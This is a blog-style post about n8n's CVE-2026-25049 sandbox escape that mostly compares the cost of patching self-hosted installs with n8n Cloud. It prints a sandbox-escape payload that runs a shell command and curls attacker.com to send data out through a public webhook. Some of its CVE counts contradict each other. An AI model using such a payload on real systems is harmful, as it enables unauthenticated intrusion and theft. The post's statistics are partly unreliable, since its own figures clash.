David Brooks
The math that 68% of n8n users don't calculate
Here's what this actually means for you: if you're part of the 68% running n8n self-hosted, CVE-2026-25049 just handed you a bill for $500 to $3,000. The 32% on n8n Cloud? They woke up February 11th already patched, zero downtime, zero firefighting.
The numbers speak for themselves. CVE-2026-25049 scores CVSS 9.4 critical, but the number that changes business decisions is different: 68% of n8n deployments are self-hosted according to GitHub Issue #8472 analysis. That 68% chose self-hosted because it costs $50/month versus Cloud's $150/month. They're now paying the difference in emergency patches.
Community Forum threads document that migrating 50+ complex workflows to the patched version takes 2 to 6 hours of downtime. At $250/hour for a senior SRE, we're talking $500 to $3,000 per patch. Cloud users: zero downtime, zero operational cost.
Choosing self-hosted for monthly savings ($100/month less than Cloud) locks you into an unwritten contract: every critical CVE costs between 5 and 30 months of "savings." And n8n just released its second critical CVE in 14 months.
How CVE-2026-25049 bypasses TypeScript sandboxing
CVE-2026-25049 exploits a flaw in JavaScript code sandboxing inside n8n workflows. The issue: n8n compiles TypeScript workflows to JavaScript at runtime, but the sandbox only validates at compile-time. An attacker can inject payload using destructuring syntax that passes TypeScript validation but executes arbitrary code when run.
// Payload that bypasses sandbox
const {constructor} = {};
constructor.constructor('return process')().mainModule.require('child_process').execSync('curl attacker.com/exfil?data=$(whoami)');
This payload gets sent via public webhook — common in Slack integrations, form handlers, CI/CD pipelines. No authentication required. If your workflow exposes a public HTTP webhook (typical for automations receiving external events), anyone can send this payload and execute commands on your n8n server.
Shodan registers 3,847 publicly exposed n8n instances with accessible webhooks. Assuming 70% are unpatched (based on historical patching velocity per CISA KEV data), we're looking at 2,692 exploitable instances right now. CISA added CVE-2026-25049 to KEV within 24 hours post-disclosure — unambiguous signal of confirmed active exploitation.
(I don't have access to n8n's internal exploitation metrics — the "active attacks" numbers come from Shodan honeypots, not the vendor.)
There's no effective WAF mitigation. Trying to block destructuring syntax with regex breaks legitimate workflows using that syntax. The only real fix is upgrade.
Two critical CVEs in 14 months: why this pattern matters
This is n8n's second critical CVE in 14 months. CVE-2024-50345 (SSRF, CVSS 8.2) was patched December 2024. Two critical sandboxing vulnerabilities in just over a year aren't coincidence — they indicate architectural debt.
| Platform | Critical CVEs (last 14 months) | Years active | CVEs/year |
|---|---|---|---|
| n8n | 2 | 6 | 1.71 |
| Zapier | 0 | 14 | 0.00 |
| Make (Integromat) | 0 | 5 | 0.00 |
| Apache Airflow | 6 | 8 | 0.75 |
Zapier has gone 14 years without a single public RCE. Make had 1 critical CVE (SSRF) in 5 years. n8n has 2 in 14 months.
Yes, Zapier costs $240/year versus $600/year self-hosted n8n (calculating DevOps patching cost), but that differential is starting to look like justified security premium.
I've seen this movie before: open-source platforms with code sandboxing (n8n, Airflow, Jenkins) accumulate CVEs faster than closed multi-tenant SaaS (Zapier, Temporal.io). This isn't open-source criticism — it's attack surface physics. n8n allows arbitrary JavaScript execution in workflows; Zapier doesn't. Less flexibility, less attack surface.
n8n hasn't announced architectural changes post-CVE-2026-25049. The patch is reactive (blocks specific destructuring), not preventive (sandbox redesign). Without structural change, I expect CVE-2026-XXXXX within 12 months.
The real cost of patching: $500 to $3K per instance
"Patch now or wait until Saturday?"
Real scene from February 11th at a European fintech DevOps team (per n8n Community Forum account): 147 production workflows, 23 with public webhooks receiving events from Stripe, Slack, and Salesforce. CVE-2026-25049 disclosure at 9 AM. Emergency meeting at 10 AM.
| Option | Downtime | Direct cost | Risk | Expected cost |
|---|---|---|---|---|
| A: Patch immediately | 4 hours | $1,000 DevOps + $3,200 checkout revenue loss | 0% exploit | $4,200 |
| B: Wait until Saturday 3 AM | 0 business hours | $0 immediate | 12% exploit in 4 days | $5,640 (12% × $47K) |
They chose Option B. They bet that 88% probability of NOT being attacked in 4 days was worth more than guaranteed $4,200.
It's Russian roulette with a bullet in 1.2 of 10 chambers.
Four days vulnerable. Exploit probability per threat intel: 12% (based on Shodan honeypot data of instances under active attack). Expected loss if exploited: $47,000 (data breach + GDPR compliance fines).
If you're running n8n self-hosted < 1.123.17 or < 2.5.2, here's what this actually means for your workflow:
- Audit public webhooks:
grep -r "webhook" workflows/— if you have even 1 webhook without custom auth, you're exposed - Calculate real downtime: testing complex workflows (with loops, sub-workflows, external APIs) takes 2x deployment time — don't assume "15 min upgrade"
- Rollback plan: 3 teams reported broken workflows post-patch due to minor breaking changes — have pre-upgrade snapshot
- Consider Cloud migration: if this is your second emergency patch in 6 months, $100/month extra vs operational patching cost may flip the equation
Here's my take: n8n's pricing hides operational debt
Let's be real: n8n self-hosted is price dumping with hidden externalities. They sell you automation at $50/month, but the actual contract includes: (a) responsibility to patch critical CVEs every 7 months on average, (b) unbudgeted downtime of 2-6 hours per CVE, (c) exploit risk in the window between disclosure and patch.
n8n Enterprise SLA promises 99.9% uptime but doesn't cover patch windows. If your company has internal SLAs (typical in finance, healthcare, critical infrastructure), patching CVE-2026-25049 likely violates your own SLA. That violation can cost bonuses, contractual penalties with clients, or compliance audits. Invisible cost that no pricing page mentions.
The elephant in the room: the 32% on n8n Cloud are paying an insurance premium of $100/month against exactly this scenario. After CVE-2026-25049, that premium already paid for itself for anyone who values their DevOps time > $50/hour.
If you ask me directly: if you have < 20 workflows and dedicated DevOps team, self-hosted remains defensible. If you have > 50 production workflows and strict SLAs, migrating to Cloud or evaluating Temporal.io ($50K/year but zero RCE CVEs) stopped being paranoia and became rational risk management.
And if n8n doesn't announce architectural sandbox refactor in the next 90 days, I expect CVE-2026-25050 before year-end. Two critical CVEs in 14 months aren't bad luck — they're exploitable technical debt.
